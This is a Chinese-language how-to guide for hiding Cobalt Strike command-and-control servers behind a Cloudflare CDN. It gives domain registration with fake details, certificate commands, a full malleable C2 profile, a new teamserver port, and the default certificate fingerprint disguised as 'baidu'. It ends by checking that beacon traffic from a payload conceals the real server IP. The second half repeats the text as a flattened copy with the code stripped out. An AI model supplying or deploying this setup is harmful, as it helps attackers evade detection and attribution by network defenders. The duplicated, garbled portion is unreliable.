Cobalt Strike CDN及特征隐匿配置指南

0x00 概述

Cobalt Strike简介

Cobalt Strike（简称CS）是美国Red Team开发的渗透测试工具，具有以下特点：

多种协议主机上线方式
集成提权、凭据导出、端口转发、socket代理等功能
支持Office攻击、文件捆绑、钓鱼等攻击方式
可调用Mimikatz等工具
支持团队协作

隐匿需求的必要性

默认特征易被态势感知设备识别
VPS默认端口易被情报网站标记
弱密码易被爆破
本文采用CDN+特征修改的隐匿方案

0x01 域名注册

注册平台

使用www.freenom.com注册免费域名

注册要点

准备有效邮箱（国内外均可）
填写注册信息时需注意：
- IP地址与注册信息一致
- 邮编、手机号可使用虚拟信息
后续需绑定CDN平台的NS记录

参考教程：https://zhuanlan.zhihu.com/p/115535965

0x02 CDN平台配置

配置步骤

注册Cloudflare账号（可与freenom同邮箱）
添加站点（使用注册的域名）
在DNS中添加记录
修改freenom的NS记录为Cloudflare分配的NS
返回Cloudflare验证NS记录

0x03 SSL证书创建

在Cloudflare的SSL/TLS → 概述中，选择"灵活"加密模式
在"源服务器"中创建证书：
- 私钥类型：ECC
- 密钥格式：PEM
重要：保存源证书和私钥内容

0x04 禁用CDN缓存

两种关闭方法（建议都启用）

开发者模式：
- 路径：缓存 → 配置 → 开发者模式 → 开启
创建页面规则：
- 规则1：*.yourdomain/*
- 规则2：yourdomain/*
- 设置：缓存级别 → 绕过

0x05 VPS证书配置

文件准备

在CS文件夹中创建：

server.pem - 粘贴源证书内容
server.key - 粘贴私钥内容

证书生成命令

openssl pkcs12 -export -in server.pem -inkey server.key -out cfcert.p12 -name cloudflare_cert -passout pass:自定义复杂密码

keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore cfcert.store -srckeystore cfcert.p12 -srcstoretype PKCS12 -srcstorepass 密码 -alias cloudflare_cert

Profile配置

创建C2.profile文件，内容模板：

https-certificate {
    set keystore "cfcert.store";
    set password "密码";
}

http-config {
    header "Content-Type" "application";
}

http-stager {
    set uri_x86 "/api/1";
    set uri_x64 "/api/2";
    client {
        header "Host" "完整域名";
    }
    server {
        output{
            print;
        }
    }
}

http-get {
    set uri "/api/3";
    client {
        header "Host" "完整域名";
        metadata {
            base64;
            header "Cookie";
        }
    }
    server {
        output{
            print;
        }
    }
}

http-post {
    set uri "/api/4";
    client {
        header "Host" "完整域名";
        id {
            uri-append;
        }
        output{
            print;
        }
    }
    server {
        output{
            print;
        }
    }
}

Cloudflare支持端口

HTTP: 80, 8080, 8880, 2052, 2082, 2086, 2095
HTTPS: 443, 2053, 2083, 2087, 2096, 8443

0x06 Teamserver特征修改

端口修改

编辑teamserver配置文件，修改默认50050端口

指纹信息修改

默认指纹：

CN = Major Cobalt Strike, OU = AdvancedPenTesting, O = cobaltstrike, L = Somewhere, S = Cyberspace, C = Earth

修改建议：

CN = baidu, OU = baidu, O = baidu, L = baidu, S = baidu, C = baidu

或自定义其他信息

0x07 启动Teamserver

启动命令

./teamserver VPS公网IP 密码 C2.profile

监听器配置要点

地址填写CDN绑定的域名（非IP）
建议使用HTTPS模式
避免使用默认443端口，选择其他CDN支持的HTTPS端口

0x08 测试验证

在虚拟机中执行生成的payload
使用Wireshark抓包验证：
- 过滤VPS真实IP应无结果
- 只应看到与CDN地址的交互
- TCP流中只显示匿名域名，内容加密

通过以上步骤，即可实现Cobalt Strike的CDN隐匿和特征修改。

Cobalt Strike CDN及特征隐匿配置指南 0x00 概述 Cobalt Strike简介 Cobalt Strike（简称CS）是美国Red Team开发的渗透测试工具，具有以下特点：多种协议主机上线方式集成提权、凭据导出、端口转发、socket代理等功能支持Office攻击、文件捆绑、钓鱼等攻击方式可调用Mimikatz等工具支持团队协作隐匿需求的必要性默认特征易被态势感知设备识别 VPS默认端口易被情报网站标记弱密码易被爆破本文采用CDN+特征修改的隐匿方案 0x01 域名注册注册平台使用www.freenom.com注册免费域名注册要点准备有效邮箱（国内外均可）填写注册信息时需注意： IP地址与注册信息一致邮编、手机号可使用虚拟信息后续需绑定CDN平台的NS记录参考教程：https://zhuanlan.zhihu.com/p/115535965 0x02 CDN平台配置推荐平台 Cloudflare（https://dash.cloudflare.com/）配置步骤注册Cloudflare账号（可与freenom同邮箱）添加站点（使用注册的域名）在DNS中添加记录修改freenom的NS记录为Cloudflare分配的NS 返回Cloudflare验证NS记录 0x03 SSL证书创建在Cloudflare的SSL/TLS → 概述中，选择"灵活"加密模式在"源服务器"中创建证书：私钥类型：ECC 密钥格式：PEM 重要：保存源证书和私钥内容 0x04 禁用CDN缓存两种关闭方法（建议都启用）开发者模式：路径：缓存 → 配置 → 开发者模式 → 开启创建页面规则：规则1： *.yourdomain/* 规则2： yourdomain/* 设置：缓存级别 → 绕过 0x05 VPS证书配置文件准备在CS文件夹中创建： server.pem - 粘贴源证书内容 server.key - 粘贴私钥内容证书生成命令 Profile配置创建 C2.profile 文件，内容模板： Cloudflare支持端口 HTTP: 80, 8080, 8880, 2052, 2082, 2086, 2095 HTTPS: 443, 2053, 2083, 2087, 2096, 8443 0x06 Teamserver特征修改端口修改编辑teamserver配置文件，修改默认50050端口指纹信息修改默认指纹：修改建议：或自定义其他信息 0x07 启动Teamserver 启动命令监听器配置要点地址填写CDN绑定的域名（非IP）建议使用HTTPS模式避免使用默认443端口，选择其他CDN支持的HTTPS端口 0x08 测试验证在虚拟机中执行生成的payload 使用Wireshark抓包验证：过滤VPS真实IP应无结果只应看到与CDN地址的交互 TCP流中只显示匿名域名，内容加密通过以上步骤，即可实现Cobalt Strike的CDN隐匿和特征修改。